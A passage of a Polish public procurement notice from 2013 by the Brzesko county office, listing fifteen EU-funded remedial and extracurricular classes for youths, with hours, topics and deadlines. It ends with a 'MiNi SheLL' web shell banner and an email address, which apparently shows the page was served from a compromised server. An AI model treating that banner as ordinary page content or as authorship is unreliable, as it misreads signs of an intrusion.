<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2013 godzina 10:00, miejsce: Starostwo Powiatowe w Brzesku Sekretariat (II p., pok. 213) ul. Głowackiego 51, 32-800 Brzesko.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt ,,ICT - Inspirujące - Ciekawe - Twórcze - program realizacji zajęć pozalekcyjnych w małopolskich ośrodkach wychowawczych i socjoterapii,, - Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych, współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Zajęcia wyrównawcze dla gr. I z języka polskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 4 wychowanków. 2. Czas trwania zajęć wynosi: 32 godziny. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować co najmniej następujące zagadnienia: odbiór wypowiedzi i wykorzystanie zawartych w nich informacji; czytanie i słuchanie; odbiór różnych komunikatów; wyszukiwanie potrzebnych informacji; samokształcenie - docieranie do informacji w różnych źródłach; świadomość językowa; zróżnicowanie słownictwa; do czego prowadzą wulgaryzmy językowe; analiza i interpretacja różnych tekstów kultury; tworzenie wypowiedzi; wypowiedzi ustne na dany temat; wypowiedzi pisemne; doskonalenie poprawnej pisowni. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Zajęcia wyrównawcze dla gr. II z języka polskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 4 wychowanków. 2. Czas trwania zajęć wynosi: 21 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować co najmniej następujące zagadnienia: odbiór wypowiedzi i wykorzystanie zawartych w nich informacji; czytanie i słuchanie; odbiór różnych komunikatów; wyszukiwanie potrzebnych informacji; samokształcenie - docieranie do informacji w różnych źródłach; analiza i interpretacja różnych tekstów kultury; tworzenie wypowiedzi; wypowiedzi ustne na dany temat; wypowiedzi pisemne. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie 3: Zajęcia wyrównawcze dla gr. I z języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 4 wychowanków. 2. Czas trwania zajęć wynosi: 39 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować co najmniej następujące zagadnienia: Wiederholung - powtórzenie i utrwalenie materiału znanego; słownictwo znane i nieznane; wakacje w górach, nad morzem, w mieście; moja rodzina i bliscy; stopień pokrewieństwa, wiek, imiona, charakterystyka postaci; moje mieszkanie, mój pokój - meble, kolory, położenie przedmiotów; liczebniki; daty - dni, tygodnie, miesiące, pory roku; zainteresowania, hobby, obowiązki domowe; zakupy, scenki rodzajowe w sklepie, w restauracji; wizyta u lekarza; dyscypliny sportowe; ochrona środowiska; tradycje Świąt Bożego Narodzenia w Niemczech i Austrii; czas przeszły Perfekt; czas przeszły Präteritum; czas przyszły Futur.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 90.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie 4: Zajęcia wyrównawcze dla gr. II z języka niemieckiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 4 wychowanków. 2. Czas trwania zajęć wynosi: 24 godziny. 3.	Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować co najmniej następujące zagadnienia: Wiederholung - powtórzenie i utrwalenie materiału znanego; moja rodzina i bliscy; stopień pokrewieństwa, wiek, imiona, charakterystyka postaci; moje mieszkanie, mój pokój - meble, kolory, położenie przedmiotów; liczebniki; daty - dni, tygodnie, miesiące, pory roku; zainteresowania, hobby, obowiązki domowe; zakupy, scenki rodzajowe w sklepie, w restauracji; wizyta u lekarza; dyscypliny sportowe; czas przeszły Perfekt; czas przeszły Präteritum; czas przyszły Futur.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie 5: Zajęcia wyrównawcze dla gr. I z języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 4 wychowanków. 2. Czas trwania zajęć wynosi: 35 godzin. 3. Program zajęć musi zostać dostosowany do możliwości wychowanków i obejmować co najmniej następujące zagadnienia: w klasie, his, that, these, those, rzeczowniki i przymiotniki, zaimki dzierżawcze, co zazwyczaj robimy, opisz co widzisz, listening for specific information, Present Simple vs Present Continuous, stopniowanie przymiotników, kraje i narodowości, reading activities, spożywanie posiłków, countable and uncountable nouns, project - months, days, pytania-what, who, where, when, how, ćwiczenia-co lubię, opis miejsca - Parts of a Mouse, places in town, pytania i odpowiedzi, There is, There are, What you  can do?, wyposażenie techniczne; opis czasu, codzienne zajęcia, tryb rozkazujący - positive and negative, Past Simple - to be, Past Simple - regular verbs, Present Simple, Present Continuous and Past Simple, główne informacje o USA i  Wielkiej Brytanii, gdzie żyjemy, pytania szczegółowe Why, pytania grzecznościowe-could,can,would like, ćwiczenia gramatyczne - possessive pronouns. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie 6: Zajęcia wyrównawcze dla gr. II z języka angielskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 4 wychowanków. 2. Czas trwania zajęć wynosi: 23 godziny. 3. Program zajęć musi zostać dostosowany do możliwości wychowanków i obejmować co najmniej następujące zagadnienia: w klasie, his, that, these, those, rzeczowniki i przymiotniki, zaimki dzierżawcze, co zazwyczaj robimy, opisz co widzisz, listening for specific information, Present Simple vs Present Continuous, stopniowanie przymiotników, reading activities, project - months, days, pytania-what, who, where, when, how, opis miejsca - Parts of a Mouse, places in town, pytania i odpowiedzi, There is, There are, What you can do, opis czasu, codzienne zajęcia, tryb rozkazujący - positive and negative, Past Simple - to be, Past Simple - regular verbs, Present Simple, Present Continuous and Past Simple, suggestions - let s what about, why don t we, pytania szczegółowe Why, pytania grzecznościowe-could,can,would like, ćwiczenia gramatyczne - possessive pronouns. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zadanie 7: Zajęcia wyrównawcze dla gr. I z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 7 wychowanków. 2. Czas trwania zajęć wynosi 30 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować m.in. następujące zagadnienia: usystematyzowanie wiadomości o liczbach; własności liczb; dzielniki, wielokrotności, cechy podzielności; liczby proste i złożone; kolejność wykonywania działań; działania na liczbach wymiernych; potęgi i pierwiastki; obliczenia procentowe; przekształcanie wyrażeń algebraicznych; rozwiązywanie równań i nierówności stopnia pierwszego z jedną niewiadomą; elementarne figury geometryczne; podział kątów; podział, klasyfikacja własności trójkątów i czworokątów; pola i obwody wielokątów z uwzględnieniem jednostek powierzchni; koło i okrąg - własności, pole i obwód; figury w prostokątnym układzie współrzędnych; figury przestrzenne; symetrie i figury przystające; różne sposoby prezentowania danych: tabelki, diagramy, wykresy; badania doświadczeń losowych. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Zadanie 8: Zajęcia wyrównawcze dla gr. II z matematyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 7 wychowanków. 2. Czas trwania zajęć wynosi 19 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować m.in. następujące zagadnienia: własności liczb; liczby proste i złożone; kolejność wykonywania działań; działania na liczbach wymiernych; potęgi i pierwiastki; obliczenia procentowe; przekształcanie wyrażeń algebraicznych; rozwiązywanie równań i nierówności stopnia pierwszego z jedną niewiadomą; elementarne figury geometryczne; podział kątów; pola i obwody wielokątów z uwzględnieniem jednostek powierzchni; koło i okrąg - własności, pole i obwód; figury w prostokątnym układzie współrzędnych. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Zadanie 9. Zajęcia wyrównawcze dla gr. I z fizyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 4 wychowanków. 2. Czas trwania zajęć wynosi 29 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować m.in. następujące zagadnienia:  czym zajmuje się fizyka; siła, równowaga sił; siła wypadkowa; energia i jej przemiany; naturalne zasoby energii; energia alternatywna; budowa cząsteczkowa materii; rozszerzalność temperaturowa ciał stałych;  ciśnienie w cieczach i gazach; Prawo Archimedesa; Aerodynamika; praca i moc; maszyny proste;  przekazywanie energii wewnętrznej; ciepło wewnętrzne; ruch jednostajny przyspieszony prostoliniowy; swobodne spadanie ciał; ruch jednostajnie opóźniony prostoliniowy; ruch drgający, przemiany energii podczas drgań; drgania wymuszone i rezonans; powstawanie fal w ośrodkach materialnych; zjawiska falowe; fale dźwiękowe; cechy dźwięków; ultradźwięki i infradźwięki; oddziaływania elektrostatyczne; przepływ prądu elektrycznego w cieczach, gazach i próżni; oddziaływania magnetyczne; oddziaływania magnetyczne wokół przewodu z prądem elektrycznym; silnik elektryczny; prądnica prądu przemiennego. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Zadanie 10. Zajęcia wyrównawcze dla gr. II z fizyki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 4 wychowanków. 2. Czas trwania zajęć wynosi 17 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować m.in. następujące zagadnienia: czym zajmuje się fizyka; siła, równowaga sił; siła wypadkowa; energia i jej przemiany; budowa cząsteczkowa materii; rozszerzalność temperaturowa ciał stałych; prawo Archimedesa; Aerodynamika; praca i moc; maszyny proste; przekazywanie energii wewnętrznej; ciepło wewnętrzne; ruch jednostajny przyspieszony prostoliniowy; swobodne spadanie ciał; powstawanie fal w ośrodkach materialnych; zjawiska falowe; fale dźwiękowe; oddziaływania elektrostatyczne; przepływ prądu elektrycznego w cieczach, gazach i próżni; oddziaływania magnetyczne; oddziaływania magnetyczne wokół przewodu z prądem elektrycznym; silnik elektryczny. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Zadanie 11. Zajęcia wyrównawcze dla gr. I z biologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 4 wychowanków. 2. Czas trwania zajęć wynosi 25 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować m.in. następujące zagadnienia: związki chemiczne budujące organizm; budowa komórki roślinnej i zwierzęcej; klasyfikowanie organizmów; życie i czynności życiowe organizmów; mszaki; paprotniki; rośliny nagonasienne i okrytonasienne; środowisko życia zwierząt; stawonogi; kręgowce; ryby rzek i jezior polskich; płazy; ptaki; struktura ekosystemów; procesy zachodzące w przyrodzie; zależności między organizmami; układ ruchu; układ pokarmowy; układ krążenia, układ nerwowy; narządy zmysłów. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Zadanie 12. Zajęcia wyrównawcze dla gr. II z biologii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć - 4 wychowanków. 2. Czas trwania zajęć wynosi 16 godzin. 3. Program zajęć musi zostać dostosowany do możliwości uczniów i obejmować m.in. następujące zagadnienia: budowa komórki roślinnej i zwierzęcej; klasyfikowanie organizmów; życie i czynności życiowe organizmów; rośliny nagonasienne i okrytonasienne; środowisko życia zwierząt; stawonogi; kręgowce; ryby rzek i jezior polskich; płazy; ptaki; struktura ekosystemów; procesy zachodzące w przyrodzie; układ ruchu; układ pokarmowy; układ krążenia, układ nerwowy; narządy zmysłów. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Zadanie 13. Zajęcia pozalekcyjne - warsztaty z obsługi nowoczesnych multimediów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 8 wychowanków. 2. Czas trwania zajęć wynosi: 20 godzin. 3. Tematyka zajęć powinna zawierać co najmniej następujące zagadnienia:
1) Obsługa projektora i laptopa: sposób podłączania, wykrywanie monitora, bezpieczne wyłączanie projektora, 2) Prawa autorskie a ściąganie plików z Internetu, 3) Pliki dźwiękowe, filmowe i ich konwersja na różne formaty, 4) Obsługa kamery cyfrowej i aparatu cyfrowego: nagrywanie filmów, robienie zdjęć,   montowanie filmu z wykorzystaniem nagrań i zrobionych zdjęć, 5) Tablica interaktywna - sposób na multimedialną prezentację, 6) Wizualizer, skaner, laptop, projektor - prezentacja danych za pomocą różnych urządzeń. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Zadanie 14. Zajęcia pozalekcyjne - warsztaty z grafiki komputerowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 8  wychowanków. 2. Czas trwania zajęć wynosi: 50 godzin. 3. Tematyka zajęć powinna zawierać co najmniej następujące zagadnienia: grafika wektorowa; grafika rastrowa; mapa bitowa; pliki bmp, jpg, raw, gif, png, psd, cdr, ai, wmf, pdf, ep, swf; Photoshop, Corel PhotoPaint, Paint Shop, Photo- Brush, CorelDraw, Illustrator, Draw Plus; grafika 3d; maski; efekty specjalne; flash. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Zadanie 15. Zajęcia sportowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Liczba uczestników zajęć: 12 wychowanków. 2. Czas trwania zajęć wynosi: 65 godzin. 3. Tematyka zajęć powinna zawierać co najmniej następujące zagadnienia:
1)  piłka nożna - prowadzenie piłki; drybling; gra 1x1 z przeciwnikiem; przyjęcie piłki wewnętrzną częścią stopy, zewnętrznym podbiciem,  prostym podbiciem w biegu, podeszwą w biegu, klatką piersiową, przyjęcie sytuacyjne; uderzenie piłki głową z wyskoku, z miejsca; uderzenia piłki wewnętrzną częścią stopy, prostym podbiciem, wewnętrznym podbiciem, zewnętrznym podbiciem i sytuacyjne; strzały z dystansu; strzały z pierwszej piłki; gra na dwie bramki; gra ze spalonym; gra w przewadze;
2)  piłka siatkowa - postawy siatkarskie; poruszanie się po boisku; krok odstawno - dostawny; krok skrzyżny; zagrywka: dolna, tenisowa rotacyjna, szybująca bezrotacyjna; przyjęcie; wystawienie; atak; blok pojedynczy; blok grupowy; obrona;  zbicie - tenisowe, plasing, kiwnięcie; sekwencja  działań w ataku - dogranie, wystawienie, atak;
3) piłka ręczna - postawy na boisku; poruszanie się po boisku; krok odstawno - dostawny, biegowy, skrzyżny, doskokiem; prawidłowe kozłowanie; atak pozycyjny; atak szybki; obrona każdy swego; obrona strefowa; rzut do bramki; rzut z linii bocznej; rzut karny; rzut wolny; rzut               z nadgarstka; marsz z odrzutem; podanie zza głowy; podanie zza głowy z kozłem; podanie piłki          z biodra; podanie piłki z przeskokiem; szybki bieg w miejscu i podania jednorącz; podania i chwyty jednorącz; 
4) piłka koszykowa - postawy na boisku; kontrola nad piłką; kozłowanie; kozłowanie ze zmianą ręki kozłującej; skip A, skip C; dwutakt po koźle; kroki; błędy kroków, piłki niesionej, podwójnego kozłowania; podania - oburącz sprzed klatki piersiowej, jednorącz, kozłem, górą za plecami; chwyty - górne dosiężne i doskoczne, półgórne dolne, z podłoża, jednorącz;  rzuty - w biegu, półobrotem, hakiem, rzut pozycyjny jednorącz, w wyskoku po kozłowaniu, w wyskoku z miejsca, wolne, sytuacyjne, po zbiórce z tablicy. 4. Pozostałe warunki określono w zał. Nr 1 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.31.00.00-0, 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com